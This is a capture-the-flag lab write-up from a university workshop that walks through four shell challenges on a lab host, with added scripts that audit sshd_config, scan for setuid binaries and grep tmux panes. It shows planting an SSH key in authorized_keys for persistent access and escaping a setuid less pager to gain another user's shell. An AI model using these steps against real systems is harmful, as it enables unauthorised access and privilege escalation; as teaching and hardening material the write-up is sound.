Introduction
0x03 Shells session presented by the UQ Cyber Squad. Access to the challenge host was via an OpenVPN connection; the OpenVPN configuration bundle was provided during the workshop.
Challenge 1 - Family Binding Time - 10pts
Let’s bind together at 192.168.57.11:8297
nc 192.168.57.11 8297
id
uid=1002(user) gid=1002(user) groups=1002(user)
pwd
/home/user
ls -las
total 60
4 drwxr-xr-x 3 user user 4096 Mar 27 06:02 .
4 drwxr-xr-x 4 root root 4096 Mar 24 02:13 ..
4 -rw------- 1 user user 1584 Mar 26 01:26 .bash_history
4 -rw------- 1 user user 105 Mar 26 00:50 .lesshst
4 -rw------- 1 user user 5 Mar 24 03:38 .python_history
4 drwxr-xr-x 2 user user 4096 Mar 26 00:59 .ssh
8 -rw------- 1 user user 5066 Mar 27 06:01 .viminfo
4 -r-xr-xr-x 1 root user 892 Mar 27 06:02 init_shell.py
20 -rwsr-xr-x 1 richard root 16728 Mar 26 00:54 read_secret_message
4 -rw-r--r-- 1 user user 24 Mar 24 02:14 user.txt
cat user.txt
flag{n1c3_b0nd1ng_t1m3}
Challenge 2 - shhhhhhhh - 20pts
How do I ssshhhhh? How do I know how to?
- I actually got to this one last because the hint was very ambiguous, and I just happened to check the SSH daemon configuration file, /etc/ssh/sshd_config.
cat /etc/ssh/sshd_config
# $OpenBSD: sshd_config,v 1.103 2018/04/09 20:41:22 tj Exp $
# This is the sshd server system-wide configuration file. See
# sshd_config(5) for more information.
# This sshd was compiled with PATH=/usr/bin:/bin:/usr/sbin:/sbin
# The strategy used for options in the default sshd_config shipped with
# OpenSSH is to specify options with their default value where
# possible, but leave them commented. Uncommented options override the
# default value.
#Port 22
#AddressFamily any
#ListenAddress 0.0.0.0
#ListenAddress ::
#HostKey /etc/ssh/ssh_host_rsa_key
#HostKey /etc/ssh/ssh_host_ecdsa_key
#HostKey /etc/ssh/ssh_host_ed25519_key
# Ciphers and keying
#RekeyLimit default none
# Logging
#SyslogFacility AUTH
#LogLevel INFO
# Authentication:
#LoginGraceTime 2m
PermitRootLogin yes
#StrictModes yes
#MaxAuthTries 6
#MaxSessions 10
# flag{c0nf1gur3d_pr0p3rly}
#PubkeyAuthentication yes
# Expect .ssh/authorized_keys2 to be disregarded by default in future.
#AuthorizedKeysFile .ssh/authorized_keys .ssh/authorized_keys2
#AuthorizedPrincipalsFile none
#AuthorizedKeysCommand none
#AuthorizedKeysCommandUser nobody
# For this to work you will also need host keys in /etc/ssh/ssh_known_hosts
#HostbasedAuthentication no
# Change to yes if you don't trust ~/.ssh/known_hosts for
# HostbasedAuthentication
#IgnoreUserKnownHosts no
# Don't read the user's ~/.rhosts and ~/.shosts files
#IgnoreRhosts yes
# To disable tunneled clear text passwords, change to no here!
PasswordAuthentication yes
#PermitEmptyPasswords no
# Change to yes to enable challenge-response passwords (beware issues with
# some PAM modules and threads)
ChallengeResponseAuthentication no
# Kerberos options
#KerberosAuthentication no
#KerberosOrLocalPasswd yes
#KerberosTicketCleanup yes
#KerberosGetAFSToken no
# GSSAPI options
#GSSAPIAuthentication no
#GSSAPICleanupCredentials yes
#GSSAPIStrictAcceptorCheck yes
#GSSAPIKeyExchange no
# Set this to 'yes' to enable PAM authentication, account processing,
# and session processing. If this is enabled, PAM authentication will
# be allowed through the ChallengeResponseAuthentication and
# PasswordAuthentication. Depending on your PAM configuration,
# PAM authentication via ChallengeResponseAuthentication may bypass
# the setting of "PermitRootLogin without-password".
# If you just want the PAM account and session checks to run without
# PAM authentication, then enable this but set PasswordAuthentication
# and ChallengeResponseAuthentication to 'no'.
UsePAM yes
#AllowAgentForwarding yes
#AllowTcpForwarding yes
#GatewayPorts no
X11Forwarding yes
#X11DisplayOffset 10
#X11UseLocalhost yes
#PermitTTY yes
PrintMotd no
#PrintLastLog yes
#TCPKeepAlive yes
#PermitUserEnvironment no
#Compression delayed
#ClientAliveInterval 0
#ClientAliveCountMax 3
#UseDNS no
#PidFile /var/run/sshd.pid
#MaxStartups 10:30:100
#PermitTunnel no
#ChrootDirectory none
#VersionAddendum none
# no default banner path
#Banner none
# Allow client to pass locale environment variables
AcceptEnv LANG LC_*
# override default of no subsystems
Subsystem sftp /usr/lib/openssh/sftp-server
# Example of overriding settings on a per-user basis
#Match User anoncvs
# X11Forwarding no
# AllowTcpForwarding no
# PermitTTY no
# ForceCommand cvs server
- Submitted: flag{c0nf1gur3d_pr0p3rly}
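Besides the flag, the dump above is worth reading as a configuration review: PermitRootLogin yes, PasswordAuthentication yes and X11Forwarding yes are all explicitly set to the weak value. The script below is an added example, not part of the original writeup or the challenge, that pulls the effective global value of a keyword out of an sshd_config and reports those settings. It follows two sshd parsing rules that an ad-hoc grep gets wrong: the first occurrence of a keyword wins, and options under a Match block are conditional, so only the section before the first Match is consulted. The two config samples it builds are constructed for the example (weak.conf mirrors the box, hardened.conf is the corrected counterpart); values are compared as written, in lower case.

```shell
#!/bin/sh
# Added example, not from the original writeup: audit sshd_config for the weak
# settings visible in the challenge dump. Only the global section is read (sshd
# applies options under "Match" conditionally) and, like sshd, the FIRST
# occurrence of a keyword is the effective one.

# Print the effective global value of keyword $2 in config file $1, or nothing
# if the option is unset. Keywords are case-insensitive; "Key value" and
# "Key=value" are both accepted, comments and blank lines are skipped.
sshd_option() {
    key=$(printf '%s' "$2" | tr 'A-Z' 'a-z')
    awk -v key="$key" '
        { line = $0; sub(/^[[:space:]]+/, "", line) }
        line ~ /^#/ || line == "" { next }
        { split(line, f, /[[:space:]=]+/); k = tolower(f[1]) }
        k == "match" { exit }          # conditional section starts: stop
        k == key     { print f[2]; exit }   # first occurrence wins
    ' "$1"
}

# Print one line per finding for config file $1 (WEAK or INFO prefix).
# Defaults assumed (OpenSSH 7.x): PermitRootLogin prohibit-password,
# PasswordAuthentication yes, PermitEmptyPasswords no, X11Forwarding no.
audit_sshd_config() {
    f="$1"
    v=$(sshd_option "$f" PermitRootLogin)
    [ "$v" = yes ] && echo "WEAK PermitRootLogin yes: set PermitRootLogin no (or prohibit-password)"
    v=$(sshd_option "$f" PasswordAuthentication)
    [ "$v" != no ] && echo "WEAK PasswordAuthentication ${v:-yes (default)}: set PasswordAuthentication no and use keys"
    v=$(sshd_option "$f" PermitEmptyPasswords)
    [ "$v" = yes ] && echo "WEAK PermitEmptyPasswords yes: set PermitEmptyPasswords no"
    v=$(sshd_option "$f" X11Forwarding)
    [ "$v" = yes ] && echo "INFO X11Forwarding yes: disable unless X11 is actually needed"
    return 0
}

# Constructed samples written into directory $1: weak.conf mirrors the
# challenge box, hardened.conf is the corrected counterpart.
write_sample_configs() {
    cat > "$1/weak.conf" <<'EOF'
# constructed sample mirroring the challenge box
#Port 22
PermitRootLogin yes
#StrictModes yes
PasswordAuthentication yes
ChallengeResponseAuthentication no
UsePAM yes
X11Forwarding yes
PrintMotd no
PermitRootLogin no
Subsystem sftp /usr/lib/openssh/sftp-server
EOF
    # the second PermitRootLogin above is ignored by sshd: first occurrence wins
    cat > "$1/hardened.conf" <<'EOF'
# constructed hardened counterpart
PermitRootLogin no
PubkeyAuthentication yes
PasswordAuthentication no
PermitEmptyPasswords no
X11Forwarding no
Match User deploy
    PasswordAuthentication yes
EOF
}

if [ $# -gt 0 ]; then
    audit_sshd_config "$1"
else
    d=$(mktemp -d)
    write_sample_configs "$d"
    for c in weak hardened; do
        echo "== $c.conf"
        audit_sshd_config "$d/$c.conf"
    done
    rm -r "$d"
fi
```

Run it with a path (sh audit.sh /etc/ssh/sshd_config) to check a real host, or with no arguments to see the two constructed samples side by side: weak.conf yields two WEAK lines and one INFO line, hardened.conf none, and the PasswordAuthentication yes under its Match block is correctly left out of the global verdict.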
Challenge 3 - Mr Richard - 20pts
More is less for Mr Richard
- Generated a local RSA keypair with ssh-keygen as user on the Parrot attacker host.
- Appended the generated public key to ~/.ssh/authorized_keys on the target by pasting an echo >> command into the nc shell (the file already held a kali@kali key).
ls -l ./.ssh/
total 4
-rw-r--r-- 1 user user 563 Mar 26 00:59 authorized_keys
cat ./.ssh/authorized_keys
ssh-rsa <public key elided> kali@kali
netstat -tln
Active Internet connections (only servers)
Proto Recv-Q Send-Q Local Address Foreign Address State
tcp 0 0 192.168.57.11:8297 0.0.0.0:* LISTEN
tcp 0 0 0.0.0.0:22 0.0.0.0:* LISTEN
tcp6 0 0 :::80 :::* LISTEN
tcp6 0 0 :::22 :::* LISTEN
echo "ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQDJnrpgXGIVZnw5zdTZMc5a7bXafaA9GxT2X5ZcO8UBYsSnTHRTl/jcxlHbvghDnNyl51N6McIrCNxjn+SmdxV9zz6LFe2a6pBCGWYGot7sfIXte4LOSXAZZHz0O6GjSR91gJv6sDpo8TTq8/J/VKLzmRA3fIounLunDpOxhRgBa6rG1QXuNm6PBBcYaxL69ygGKR630RmaxKxYvSkHB126AmYi+8hBXvnsDtfg6BX9koIJP3aNyek/7VPrTAn3peV/H7uvWGDZOYoSRCwuMYEFQcyJfI0R382wWCMWaMMyamTTYepyt9tiqGKl5DZzErfhTpyXHzql/Due4I9aRuWo7naJ8AesIw5vdYXvkPwfvEiFRiK1HFde/5+5a7uEJev1q1kL5S77Kjr/Bo3FVRvxfMqsByOlQc7ME60AnKXtxOAzbyFRjXDaTKZcmNMeUoV42ogATxY2RHDHGrvMdRR5qB4AldGwLKFump0ekWUy6Gx/wT/GRnX/4ml1ods7B2s= user@parrot" >> ./.ssh/authorized_keys
cat ./.ssh/authorized_keys
ssh-rsa <public key elided> kali@kali
ssh-rsa <public key elided, the one appended above> user@parrot
- SSHed onto the host as user with the matching private key:
ssh -i user_rsa user@192.168.57.11
Linux Tom 4.19.0-8-amd64 #1 SMP Debian 4.19.98-1 (2020-01-26) x86_64
The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.
Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
Last login: Thu Mar 26 00:59:42 2020 from 192.168.57.3
$ id
uid=1002(user) gid=1002(user) groups=1002(user)
$ ls -las
total 60
4 drwxr-xr-x 3 user user 4096 Mar 27 06:02 .
4 drwxr-xr-x 4 root root 4096 Mar 24 02:13 ..
4 -rw------- 1 user user 1584 Mar 26 01:26 .bash_history
4 -r-xr-xr-x 1 root user 892 Mar 27 06:02 init_shell.py
4 -rw------- 1 user user 105 Mar 26 00:50 .lesshst
4 -rw------- 1 user user 5 Mar 24 03:38 .python_history
20 -rwsr-xr-x 1 richard root 16728 Mar 26 00:54 read_secret_message
4 drwxr-xr-x 2 user user 4096 Mar 26 00:59 .ssh
4 -rw-r--r-- 1 user user 24 Mar 24 02:14 user.txt
8 -rw------- 1 user user 5066 Mar 27 06:01 .viminfo
- Ran strings on read_secret_message and assumed from the output that it runs the less pager, so the SUID binary hands an interactive program to the caller while running as richard. Ran it, resized the terminal window so the message no longer fit and less started paging, then escaped with the !sh command. The resulting shell runs as richard, as the id output below confirms. Once out, grabbed the richard flag.
$ ./read_secret_message
$ id
uid=1001(richard) gid=1002(user) groups=1002(user)
$ pwd
/home/user
$ cd ../richard
$ ls -las
total 56
4 drwxr-xr-x 3 richard richard 4096 Mar 26 01:00 .
4 drwxr-xr-x 4 root root 4096 Mar 24 02:13 ..
4 -rw------- 1 richard richard 1233 Mar 26 01:09 .bash_history
4 -rw------- 1 richard richard 34 Mar 24 03:07 .lesshst
4 -rw-r--r-- 1 root root 597 Mar 24 03:05 message.txt
20 -rwsr-xr-x 1 richard root 16728 Mar 26 00:53 read_secret_message
4 -rw-r----- 1 richard richard 210 Mar 26 00:53 read_secret_message.c
4 -rw-r----- 1 richard richard 22 Mar 24 02:45 richard.txt
4 drwxr-xr-x 2 richard user 4096 Mar 26 01:00 .ssh
4 -rw------- 1 richard richard 1662 Mar 24 03:22 .viminfo
$ cat richard.txt
flag{1_4m_mr_r1ch4rd}
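The enumeration behind this challenge generalises: any setuid binary that launches a pager, editor or shell is a privilege-escalation candidate, because the child inherits the elevated identity and less, vi and friends all offer a way to spawn a command. The script below is an added example, not from the original writeup, that walks a directory tree for setuid or setgid files and reports those whose printable strings mention such a program or one of the libc calls that typically starts it. It uses tr(1) instead of strings(1), which is not always installed on a target. The demo fixture it builds (a fake read_secret_message containing "less message.txt", a harmless setuid file, and a non-setuid copy) is constructed for the example; the match list is a triage heuristic and will produce false positives, "more" in a help string for instance.

```shell
#!/bin/sh
# Added example, not from the original writeup: find setuid/setgid files and
# flag those that embed the name of an interactive program (pager, editor,
# shell) or of a libc call that launches one. A setuid binary that hands
# control to less, like read_secret_message, lets the caller escape with !sh
# into a shell that holds the owner's privileges.

# Print "path: token token ..." for every setuid/setgid regular file under $1
# whose printable strings contain a suspicious token. Unreadable files and
# directories are skipped silently.
suid_pager_candidates() {
    root="$1"
    find "$root" -type f \( -perm -4000 -o -perm -2000 \) 2>/dev/null \
    | while IFS= read -r f; do
        # tr turns every non-printable byte into a newline, a portable stand-in
        # for strings(1); -w keeps "sh" from matching inside ".shstrtab" etc.
        hits=$(tr -c '[:print:]' '\n' < "$f" 2>/dev/null \
               | grep -E -o -w 'less|more|vi|vim|nano|sh|bash|system|execve|execl|execlp|popen' \
               | sort -u | tr '\n' ' ')
        if [ -n "$hits" ]; then
            printf '%s: %s\n' "$f" "$hits"
        fi
    done
}

# Constructed fixture for a dry run in directory $1: a fake setuid "binary"
# that embeds a pager invocation, a setuid file without one, and a non-setuid
# copy of the first. Only the mode bits and the embedded strings matter here.
make_demo_dir() {
    d="$1"
    printf 'ELF\0/bin/sh\0less message.txt\0' > "$d/read_secret_message"
    chmod 4755 "$d/read_secret_message"
    printf 'ELF\0hello world\0' > "$d/harmless_suid"
    chmod 4755 "$d/harmless_suid"
    printf 'ELF\0less message.txt\0' > "$d/not_suid"
    chmod 755 "$d/not_suid"
}

if [ $# -gt 0 ]; then
    suid_pager_candidates "$1"    # e.g. sh suid_scan.sh /
else
    d=$(mktemp -d)
    make_demo_dir "$d"
    suid_pager_candidates "$d"    # reports only read_secret_message: less sh
    rm -r "$d"
fi
```

Run against / on a target it gives a short list to inspect by hand with strings and ltrace. On the defensive side the fix is not to launch a pager from a setuid program at all; if it is unavoidable, drop privileges before the exec, and note that less honours LESSSECURE=1, which disables the ! shell escape.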
Challenge 4 - Too Much T Mux - 20pts
There’s so many!!!
- Listed the tmux sessions using the tmux ls command.
- Manually attached to each session with tmux a -t session_name to look for the flag.
- Found the flag in the goodluck session.
tmux ls
bluh: 1 windows (created Tue Mar 24 02:47:54 2020) [238x48]
find_me: 1 windows (created Tue Mar 24 02:48:24 2020) [238x48]
goodluck: 1 windows (created Tue Mar 24 02:48:11 2020) [238x48]
hahahahaha: 1 windows (created Tue Mar 24 02:48:02 2020) [238x48]
j: 1 windows (created Tue Mar 24 02:51:36 2020) [238x48]
this_is_evil: 1 windows (created Tue Mar 24 02:48:57 2020) [238x48]
richard@Tom:~$ tmux a -t goodluck
[detached (from session goodluck)]
- Submitted: flag{d3ep_d0wn_und3r}
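Attaching to six sessions by hand works at this scale, but tmux can also list every pane on the server and dump a pane's full scrollback to stdout, so the flag pattern can be searched across all sessions in one pass without ever attaching. The script below is an added example, not from the original writeup; it assumes the caller can open the sessions' server socket (here, running as richard, who owns the sessions), and the default flag pattern is an assumption about the CTF's flag format taken from the flags on this page.

```shell
#!/bin/sh
# Added example, not from the original writeup: grep the scrollback of every
# tmux pane on the server for a pattern instead of attaching session by session.

# Print "session:window.pane: match" for every match of ERE $1 in any pane.
tmux_grep_panes() {
    pattern="$1"
    # -a lists panes across all sessions; the format yields a target for -t
    tmux list-panes -a -F '#{session_name}:#{window_index}.#{pane_index}' \
    | while IFS= read -r target; do
        # -p prints to stdout, -J joins wrapped lines, -S - starts at the
        # oldest scrollback line rather than the visible screen
        tmux capture-pane -p -J -S - -t "$target" \
        | grep -E -o "$pattern" \
        | awk -v t="$target" '{ print t ": " $0 }'
    done
}

default='flag[{][^}]*[}]'      # assumed flag format, matches flag{...}
if command -v tmux >/dev/null 2>&1; then
    tmux_grep_panes "${1:-$default}"
fi
```

On the challenge box this prints one line naming the goodluck pane and the flag, while sessions whose panes hold nothing matching stay silent. If the sessions belong to another user the list-panes call fails with a socket error; tmux servers live under /tmp/tmux-UID and are only reachable by their owner (or root), which is why this had to be done as richard.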